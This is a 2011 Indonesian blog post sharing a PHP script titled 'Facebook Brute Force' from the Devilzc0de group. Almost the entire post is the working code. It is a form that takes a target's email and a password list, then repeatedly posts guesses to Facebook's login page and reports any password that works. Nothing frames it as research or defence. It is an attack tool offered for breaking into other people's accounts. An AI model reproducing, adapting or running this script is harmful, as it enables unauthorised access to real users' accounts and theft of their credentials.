Sabtu, 29 Oktober 2011

[ PHP ] Facebook Brute Force

# Author : Poticous
# Tool Name : Facebook Brute Force
# Version : 1.0

<html>
<head>
<title>Facebook Brute By Poticous</title>
<style>
body{
    background:#000000;
    font-size:12px;
    font-family:Tahoma,Verdana,Arial;
    color:#fff;
}
.footer{
    text-align:right;
    padding:0 16px;
    font-size:10px;
    letter-spacing:2px;
    color:#999999;
}
.footer:hover{
    text-align:right;
    padding:0 16px;
    font-size:10px;
    letter-spacing:2px;
    color:#999999;
    text-decoration:underline;
}
.input{
    width:200px;
    background-color:#000;
    color:#fff;
}
textarea.input{
    height:100px;
    background:url(http://a2.l3-images.myspacecdn.com/profile01/114/d4382a4276b04c78ae2e84f3e0526cf1/p.jpg) no-repeat;
    color:#fff;
}
</style>
</head>
<body>
<?php
if($_POST){
$file = "devilzc0de_fb.txt";
$pwd = $_POST['passwd'];
$handle = fopen($file, 'w');
fwrite($handle, "$pwd");
fclose($handle);
set_time_limit(0);
$username = $_POST['email_target'];
$dictionary ="devilzc0de_fb.txt";
// Mencari Value Submit
$homepage = file_get_contents('http://www.facebook.com/');
$string_awal   = '<input value="';
$string_akhir   = '" name="login" onclick="" type="submit" id="uidny_1" />';
$homepage = explode($string_awal, $homepage);
$homepage = explode($string_akhir, $homepage[1]);
##########################################
function kontrol($emailtarget,$passtarget){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$emailtarget&pass=$passtarget&login=".$homepage[0]; ;
$ch = curl_init('https://www.facebook.com/login.php?login_attempt=1');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie_fb.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie_fb.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("<title>Facebook</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "Kamus Password Tidak Di Temukan";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font color=\"green\"><b>[+]</b> username : $username , password : $line - Password found : $line</font><br>";}
else{echo "<font color=\"red\"><b>[-]</b> username : $username , password : $line - Password not found :  $line</font><br>";
}
}
}else{
?>
<form action="" method="post">
<p>
<label>Username<br>
<input type="text" name="email_target" class="input"></label>
</p>
<p>
<label>List Password<br>
<textarea name="passwd" class="input"></textarea></label>
</p>
<input type="submit" value="Attack">
</form>
<?
}
?>
<p class="footer">&copy; <?php echo date('Y'); ?> Poticous - Devilzc0de</p>
</body>
</html>
SuperNewbie 06.45

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)